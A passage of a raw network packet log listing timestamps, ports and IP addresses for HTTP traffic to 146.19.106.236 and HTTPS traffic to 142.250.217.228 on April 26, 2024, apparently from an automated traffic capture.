Apr 26, 2024 23:16:31.544665098 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.544692993 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.544708014 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.544719934 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.544750929 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.544780970 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.544800043 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.544809103 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.544821024 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.544836998 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.544863939 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.544895887 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.544910908 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.544924021 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.544934034 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.544974089 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.545026064 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.545053959 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.545079947 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.545082092 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.545104027 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.545109034 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.545136929 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.545145035 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.545188904 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.545217991 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.545244932 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.545254946 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.545274019 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.545284033 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.545300007 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.545327902 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.545353889 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.545353889 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.545383930 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.545398951 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.545411110 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.545439005 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.545465946 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.545480967 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.545494080 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.545521975 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.545531034 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.545550108 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.545562029 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.545579910 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.545608044 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.545651913 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.545659065 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.545743942 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.545808077 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.545861006 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.545890093 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.545942068 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.545943975 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.545983076 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.545991898 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.546020985 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.546047926 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.546087980 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.546144962 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.546196938 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.546236992 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.546247959 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.546314001 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.546327114 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.546355963 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.546430111 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.546458006 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.546480894 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.546488047 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.546504974 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.547302961 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.547353983 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.547463894 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.547492027 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.547521114 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.547548056 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.547565937 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.547576904 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.547595978 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.547605038 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.547631979 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.547658920 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.547666073 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.547692060 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.547703028 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.547719002 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.547748089 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.547775030 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.547791004 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.547802925 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.547816992 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.547831059 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.547858953 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.547882080 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.547885895 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.547914028 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.547926903 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.547941923 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.547971010 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.547998905 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.548012972 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.548026085 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.548042059 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.548058987 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.548085928 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.548105955 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.548135996 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.548165083 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.548192978 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.548213959 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.548222065 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.548235893 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.548250914 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.548278093 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.548309088 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.548321009 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.548336983 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.548350096 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.548363924 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.548393965 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.548423052 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.548438072 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.548449039 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.548474073 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.548476934 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.548504114 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.548532009 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.548547983 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.548557997 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.548572063 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.548585892 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.548614979 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.548644066 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.548667908 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.548671007 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.548691034 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.548696995 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.548717022 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.548724890 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.548743963 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.548754930 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.548770905 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.548784971 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.548803091 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.548814058 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.548839092 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.548840046 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.548863888 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.548893929 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.720544100 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.720609903 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.720623970 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.720650911 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.720654964 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.720694065 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.720705032 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.720736980 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.720743895 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.720776081 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.720782042 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.720815897 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.720825911 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.720858097 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.720879078 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.720899105 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.720901966 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.720937967 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.720944881 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.720978022 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.720984936 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.721016884 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.721024036 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.721057892 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.721066952 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.721102953 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.721106052 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.721158981 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:34.595561028 CEST	49675	443	192.168.2.4	173.222.162.32
Apr 26, 2024 23:16:36.349348068 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:36.353441954 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:36.406086922 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:36.581028938 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:38.809220076 CEST	49736	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:16:38.809273958 CEST	443	49736	142.250.217.228	192.168.2.4
Apr 26, 2024 23:16:38.809335947 CEST	49736	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:16:38.809705019 CEST	49737	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:16:38.809730053 CEST	443	49737	142.250.217.228	192.168.2.4
Apr 26, 2024 23:16:38.809891939 CEST	49738	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:16:38.809895992 CEST	49737	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:16:38.809995890 CEST	443	49738	142.250.217.228	192.168.2.4
Apr 26, 2024 23:16:38.810060024 CEST	49738	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:16:38.810189962 CEST	49739	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:16:38.810220003 CEST	443	49739	142.250.217.228	192.168.2.4
Apr 26, 2024 23:16:38.810343981 CEST	49739	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:16:38.810556889 CEST	49738	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:16:38.810586929 CEST	443	49738	142.250.217.228	192.168.2.4
Apr 26, 2024 23:16:38.810765028 CEST	49737	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:16:38.810776949 CEST	443	49737	142.250.217.228	192.168.2.4
Apr 26, 2024 23:16:38.810982943 CEST	49736	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:16:38.811001062 CEST	443	49736	142.250.217.228	192.168.2.4
Apr 26, 2024 23:16:38.811366081 CEST	49739	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:16:38.811379910 CEST	443	49739	142.250.217.228	192.168.2.4
Apr 26, 2024 23:16:39.138461113 CEST	443	49737	142.250.217.228	192.168.2.4
Apr 26, 2024 23:16:39.138961077 CEST	443	49738	142.250.217.228	192.168.2.4
Apr 26, 2024 23:16:39.181266069 CEST	49737	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:16:39.183094025 CEST	49738	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:16:39.195436954 CEST	443	49736	142.250.217.228	192.168.2.4
Apr 26, 2024 23:16:39.282258034 CEST	49736	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:16:39.369955063 CEST	443	49739	142.250.217.228	192.168.2.4
Apr 26, 2024 23:16:39.580126047 CEST	443	49739	142.250.217.228	192.168.2.4
Apr 26, 2024 23:16:39.580193043 CEST	49739	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:16:40.418605089 CEST	49739	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:16:40.418637037 CEST	443	49739	142.250.217.228	192.168.2.4
Apr 26, 2024 23:16:40.420198917 CEST	49736	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:16:40.420212984 CEST	443	49736	142.250.217.228	192.168.2.4
Apr 26, 2024 23:16:40.420614958 CEST	443	49739	142.250.217.228	192.168.2.4
Apr 26, 2024 23:16:40.420672894 CEST	49739	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:16:40.421444893 CEST	49738	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:16:40.421454906 CEST	443	49736	142.250.217.228	192.168.2.4
Apr 26, 2024 23:16:40.421468019 CEST	443	49736	142.250.217.228	192.168.2.4
Apr 26, 2024 23:16:40.421519041 CEST	49736	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:16:40.421531916 CEST	443	49738	142.250.217.228	192.168.2.4
Apr 26, 2024 23:16:40.422172070 CEST	49737	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:16:40.422199965 CEST	443	49737	142.250.217.228	192.168.2.4
Apr 26, 2024 23:16:40.422473907 CEST	443	49738	142.250.217.228	192.168.2.4
Apr 26, 2024 23:16:40.422539949 CEST	49738	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:16:40.423134089 CEST	443	49737	142.250.217.228	192.168.2.4
Apr 26, 2024 23:16:40.423186064 CEST	49737	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:16:40.434283972 CEST	49739	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:16:40.434365988 CEST	443	49739	142.250.217.228	192.168.2.4
Apr 26, 2024 23:16:40.434554100 CEST	49736	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:16:40.434624910 CEST	443	49736	142.250.217.228	192.168.2.4
Apr 26, 2024 23:16:40.434627056 CEST	49738	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:16:40.434721947 CEST	443	49738	142.250.217.228	192.168.2.4
Apr 26, 2024 23:16:40.437273026 CEST	49737	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:16:40.437334061 CEST	443	49737	142.250.217.228	192.168.2.4
Apr 26, 2024 23:16:40.441029072 CEST	49739	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:16:40.441040993 CEST	443	49739	142.250.217.228	192.168.2.4
Apr 26, 2024 23:16:40.441294909 CEST	49736	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:16:40.441302061 CEST	443	49736	142.250.217.228	192.168.2.4
Apr 26, 2024 23:16:40.441432953 CEST	49738	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:16:40.441451073 CEST	443	49738	142.250.217.228	192.168.2.4
Apr 26, 2024 23:16:40.441776037 CEST	49737	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:16:40.441793919 CEST	443	49737	142.250.217.228	192.168.2.4
Apr 26, 2024 23:16:40.486063957 CEST	49736	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:16:40.486068010 CEST	49739	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:16:40.579797983 CEST	49738	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:16:40.579802990 CEST	49737	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:16:40.663891077 CEST	443	49739	142.250.217.228	192.168.2.4
Apr 26, 2024 23:16:40.663949966 CEST	443	49739	142.250.217.228	192.168.2.4
Apr 26, 2024 23:16:40.663999081 CEST	49739	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:16:40.664014101 CEST	443	49739	142.250.217.228	192.168.2.4
Apr 26, 2024 23:16:40.665783882 CEST	443	49739	142.250.217.228	192.168.2.4
Apr 26, 2024 23:16:40.665843964 CEST	49739	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:16:40.778541088 CEST	49739	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:16:40.778563976 CEST	443	49739	142.250.217.228	192.168.2.4
Apr 26, 2024 23:16:40.780795097 CEST	49740	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:16:40.780843019 CEST	443	49740	142.250.217.228	192.168.2.4
Apr 26, 2024 23:16:40.780900955 CEST	49740	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:16:40.781884909 CEST	49740	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:16:40.781903028 CEST	443	49740	142.250.217.228	192.168.2.4
Apr 26, 2024 23:16:40.812928915 CEST	49736	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:16:40.813011885 CEST	443	49736	142.250.217.228	192.168.2.4
Apr 26, 2024 23:16:40.813071012 CEST	49736	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:16:40.875076056 CEST	443	49737	142.250.217.228	192.168.2.4
Apr 26, 2024 23:16:40.875137091 CEST	49737	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:16:40.875153065 CEST	443	49737	142.250.217.228	192.168.2.4
Apr 26, 2024 23:16:40.875214100 CEST	443	49737	142.250.217.228	192.168.2.4
Apr 26, 2024 23:16:40.875294924 CEST	49737	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:16:40.877027035 CEST	49737	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:16:40.877043962 CEST	443	49737	142.250.217.228	192.168.2.4
Apr 26, 2024 23:16:40.880548954 CEST	49741	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:16:40.880587101 CEST	443	49741	142.250.217.228	192.168.2.4
Apr 26, 2024 23:16:40.880633116 CEST	49741	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:16:40.880917072 CEST	49741	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:16:40.880932093 CEST	443	49741	142.250.217.228	192.168.2.4
Apr 26, 2024 23:16:41.078035116 CEST	443	49738	142.250.217.228	192.168.2.4
Apr 26, 2024 23:16:41.078131914 CEST	49738	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:16:41.078197002 CEST	443	49738	142.250.217.228	192.168.2.4
Apr 26, 2024 23:16:41.078345060 CEST	443	49738	142.250.217.228	192.168.2.4
Apr 26, 2024 23:16:41.078419924 CEST	49738	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:16:41.078975916 CEST	49738	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:16:41.079018116 CEST	443	49738	142.250.217.228	192.168.2.4
Apr 26, 2024 23:16:41.079054117 CEST	49738	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:16:41.079077005 CEST	49738	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:16:41.081515074 CEST	49742	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:16:41.081557035 CEST	443	49742	142.250.217.228	192.168.2.4
Apr 26, 2024 23:16:41.081787109 CEST	49742	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:16:41.082015038 CEST	49742	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:16:41.082031965 CEST	443	49742	142.250.217.228	192.168.2.4
Apr 26, 2024 23:16:41.167823076 CEST	443	49740	142.250.217.228	192.168.2.4
Apr 26, 2024 23:16:41.168071032 CEST	49740	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:16:41.168117046 CEST	443	49740	142.250.217.228	192.168.2.4
Apr 26, 2024 23:16:41.168402910 CEST	443	49740	142.250.217.228	192.168.2.4
Apr 26, 2024 23:16:41.168690920 CEST	49740	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:16:41.168747902 CEST	443	49740	142.250.217.228	192.168.2.4
Apr 26, 2024 23:16:41.168865919 CEST	49740	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:16:41.212124109 CEST	443	49740	142.250.217.228	192.168.2.4
Apr 26, 2024 23:16:41.267812967 CEST	443	49741	142.250.217.228	192.168.2.4
Apr 26, 2024 23:16:41.268384933 CEST	49741	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:16:41.268398046 CEST	443	49741	142.250.217.228	192.168.2.4
Apr 26, 2024 23:16:41.268858910 CEST	443	49741	142.250.217.228	192.168.2.4
Apr 26, 2024 23:16:41.269293070 CEST	49741	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:16:41.269373894 CEST	443	49741	142.250.217.228	192.168.2.4
Apr 26, 2024 23:16:41.269469023 CEST	49741	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:16:41.312146902 CEST	443	49741	142.250.217.228	192.168.2.4
Apr 26, 2024 23:16:41.413336039 CEST	443	49742	142.250.217.228	192.168.2.4
Apr 26, 2024 23:16:41.413590908 CEST	49742	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:16:41.413621902 CEST	443	49742	142.250.217.228	192.168.2.4
Apr 26, 2024 23:16:41.414649010 CEST	443	49742	142.250.217.228	192.168.2.4
Apr 26, 2024 23:16:41.414701939 CEST	49742	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:16:41.416773081 CEST	49742	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:16:41.416842937 CEST	443	49742	142.250.217.228	192.168.2.4
Apr 26, 2024 23:16:41.417006016 CEST	49742	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:16:41.417013884 CEST	443	49742	142.250.217.228	192.168.2.4
Apr 26, 2024 23:16:41.485204935 CEST	49742	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:16:41.583848953 CEST	443	49740	142.250.217.228	192.168.2.4
Apr 26, 2024 23:16:41.583929062 CEST	443	49740	142.250.217.228	192.168.2.4
Apr 26, 2024 23:16:41.583987951 CEST	49740	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:16:41.584013939 CEST	443	49740	142.250.217.228	192.168.2.4
Apr 26, 2024 23:16:41.584199905 CEST	443	49740	142.250.217.228	192.168.2.4
Apr 26, 2024 23:16:41.584254026 CEST	49740	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:16:41.584263086 CEST	443	49740	142.250.217.228	192.168.2.4
Apr 26, 2024 23:16:41.594286919 CEST	443	49740	142.250.217.228	192.168.2.4
Apr 26, 2024 23:16:41.594347000 CEST	49740	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:16:41.594357967 CEST	443	49740	142.250.217.228	192.168.2.4
Apr 26, 2024 23:16:41.607191086 CEST	443	49740	142.250.217.228	192.168.2.4
Apr 26, 2024 23:16:41.607243061 CEST	49740	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:16:41.607254982 CEST	443	49740	142.250.217.228	192.168.2.4
Apr 26, 2024 23:16:41.607290983 CEST	443	49740	142.250.217.228	192.168.2.4
Apr 26, 2024 23:16:41.607331038 CEST	49740	443	192.168.2.4	142.250.217.228
